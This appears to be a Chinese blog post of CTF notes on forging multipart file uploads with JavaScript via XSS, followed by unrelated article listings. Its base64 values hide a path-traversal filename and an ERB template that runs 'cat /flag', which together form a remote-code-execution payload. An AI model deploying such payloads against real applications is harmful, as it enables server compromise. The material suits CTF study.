1.用h5对象上传表单(图片)

    var formData = new FormData();

    formData.append("authenticity_token", '1212121212');

    formData.append("file[context]", "zxcvxzcvxzcv");

    var content = 'PCU9IGBjYXQgL2ZsYWcgYCAlPg==';   //这是文件内容的base64

    var blob = new Blob([content], { type: "image/png"});

    formData.append("file[myfile]", blob,"Ly4uLy4uL2FwcC92aWV3cy9ob21lL2FhMzguZXJi");  //这里是文件名的base64

    formData.append("commit", 'submit');

    var request = new XMLHttpRequest();

    request.open("POST", "https://xz.aliyun.com/t/3245");

    request.send(formData);

请求体

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2

Content-Disposition: form-data; name="authenticity_token"

1212121212

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2

Content-Disposition: form-data; name="file[context]"

zxcvxzcvxzcv

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2

Content-Disposition: form-data; name="file[myfile]"; filename="Ly4uLy4uL2FwcC92aWV3cy9ob21lL2FhMzguZXJi"

Content-Type: image/png

PCU9IGBjYXQgL2ZsYWcgYCAlPg==

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2

Content-Disposition: form-data; name="commit"

submit

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2--

1.用h5对象上传表单(txt)

    var formData = new FormData();

    var content = 'testestestes';   //这是文件内容的base64

    var blob = new Blob([content], { type: "text/plain"});

    formData.append("file[myfile]", blob,"haha.txt");  //这里是文件名的base64

    formData.append("commit", 'submit');

    var request = new XMLHttpRequest();

    request.open("POST", "https://xz.aliyun.com/t/3245");

    request.send(formData);

请求体

------WebKitFormBoundaryFcFYtbPnXsiq8yjI

Content-Disposition: form-data; name="file[myfile]"; filename="haha.txt"

Content-Type: text/plain

testestestes

------WebKitFormBoundaryFcFYtbPnXsiq8yjI

Content-Disposition: form-data; name="commit"

submit

------WebKitFormBoundaryFcFYtbPnXsiq8yjI--

2.使用原生js上传表单数据

通过余弦这个网站辅助生成表单

xhr = function(){

  /*AJAX*/

  var request = false;

  if(window.XMLHttpRequest) {

    request = new XMLHttpRequest();

  } else if(window.ActiveXObject) {

    try {

      request = new window.ActiveXObject('Microsoft.XMLHTTP');

    } catch(e) {}

  }

  return request;

}();

request = function(method,src,argv,content_type){

  xhr.open(method,src,false);

  if(method=='POST')xhr.setRequestHeader('Content-Type',content_type);

  xhr.send(argv);

  return xhr.responseText;

}

attack_a = function(){

  var src = "https://xz.aliyun.com";

  var authenticity_token = "1212121212";

  var file = "zxcvxzcvxzcv";

  var argv_0 = "\r\n";

  argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"authenticity_token\"\r\n\r\n";

  argv_0 += (authenticity_token+"\r\n");

  argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n";

  argv_0 += (file+"\r\n");

  argv_0 += "---------------------7964f8dddeb95fc5--\r\n";

  request("POST",src,argv_0,"multipart/form-data; boundary=-------------------7964f8dddeb95fc5");

}

请求体:

---------------------7964f8dddeb95fc5

Content-Disposition: form-data; name="authenticity_token"

1212121212

---------------------7964f8dddeb95fc5

Content-Disposition: form-data; name="file"

zxcvxzcvxzcv

---------------------7964f8dddeb95fc5--

HCTF share的详解ajax构造表单:

https://xz.aliyun.com/t/3258   xss上传表单

http://sec2hack.com/ctf/sctf2018-web-writeup.html xss获取源码

https://xz.aliyun.com/t/2469#toc-1巅峰极客wp,xss获取图片

ajax上传表单的俩种方式的更多相关文章

  1. 使用ajax上传表单(带文件)

    在使用form表单的时候上传文件+表单,会使得页面跳转,而在某些时候不希望跳转,只变化页面中的局部信息 通过查找资料,可以使用FormData进行ajax操作. FormData介绍:XMLHttpR ...

  2. 使用AJAX异步提交表单的几种方式

    方式一 手工收集所有的用户输入,封装为大的“k1=v1&k2=v2…”键值对形式,使用$.post(url, data,fn)把数据提交给服务器 $.ajax({ type:'post', u ...

  3. 【Flask】 结合wtforms的文件上传表单

    表单中的文件上传 基本的表单渲染,表单类设置等等就不多说了,参看另一个文章即可.但是那篇文章里没有提到对于FileField,也就是上传文件的表单字段是如何处理,后端又是如何实现接受上传过来的文件的. ...

  4. 上传漏洞科普[1]-文件上传表单是Web安全主要威胁

    为了让最终用户将文件上传到您的网站,就像是给危及您的服务器的恶意用户打开了另一扇门.即便如此,在今天的现代互联网的Web应用程序,它是一种 常见的要求,因为它有助于提高您的业务效率.在Facebook ...

  5. bootstrap上传表单的时候上传的数据默认是0 一定要小心

    bootstrap上传表单的时候上传的数据默认是0 一定要小心

  6. JavaScript表单提交四种方式

    总结JavaScript表单提交四种方式 <!DOCTYPE html> <html> <head> <title>JavaScript表单提交四种方式 ...

  7. Ajax提交Form表单的一种方法

    待提交的表单 <form id="updatePublicKey" enctype="multipart/form-data"> <div c ...

  8. C# MVC提交表单的四种方式(转)

    Mvc 提交表单的4种方法全程详解(转) 一,MVC  HtmlHelper方法 Html.BeginForm(actionName,controllerName,method,htmlAttribu ...

  9. 【总结-前台发送后台接收表单】MVC提交表单的四种方式

    https://www.cnblogs.com/chenwolong/p/Form.html#commentform 后台控制器接收前台表单参数三种方法: 一.普通参数 HTML标签name 和参数名 ...

随机推荐

  1. Best MVC Practices 最佳的MVC实践

    Although Model-View-Controller (MVC) is known by nearly every Web developer, how to properly use MVC ...

  2. [LeetCode] Add Two Numbers题解

    Add Two Numbers: You are given two non-empty linked lists representing two non-negative integers. Th ...

  3. java 自定义 LRU(最近最少使用)策略 实现 缓存机制

    1. java提供了一个简单的方式实现LRU:  LinkedHashMap   2. 自定义实现 LRU至少需要两个主要操作: 添加(add)和搜索(search) public class LRU ...

  4. OI中的一些模板

    线性筛 #include"cstdio" #include"cstring" #include"iostream" #include&quo ...

  5. 新版qq canvas 动态背景

    <!doctype html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  6. arcgis 3种方法快速制作tpk文件(转)

    来自:http://blog.csdn.net/arcgis_mobile/article/details/8048549 tpk是ArcGIS10.1推出的一种新的数据文件类型,主要是用于将切片文件 ...

  7. Climbing Stairs 爬楼梯问题,每次可以走1或2步,爬上n层楼梯总方法 (变相fibonacci)

    You are climbing a stair case. It takes n steps to reach to the top. Each time you can either climb ...

  8. zTree 学习笔记之(一)

    zTree 学习笔记之(一) 简介 zTree 是一个依靠 jQuery 实现的多功能 “树插件”.优异的性能.灵活的配置.多种功能的组合是 zTree 最大优点. 到底有哪些具体的优点,可以参见官网 ...

  9. 如何写一个能在gulp build pipe中任意更改src内容的函数

    gulp在前端自动化构建中非常好用,有非常丰富的可以直接拿来使用的plugin,完成我们日常构建工作. 但是万事没有十全十美能够完全满足自己的需求,这时我们就要自己动手写一个小的函数,用于在gulp ...

  10. 从golang-gin-realworld-example-app项目学写httpapi (六)

    https://github.com/gothinkster/golang-gin-realworld-example-app/blob/master/users/validators.go 验证器 ...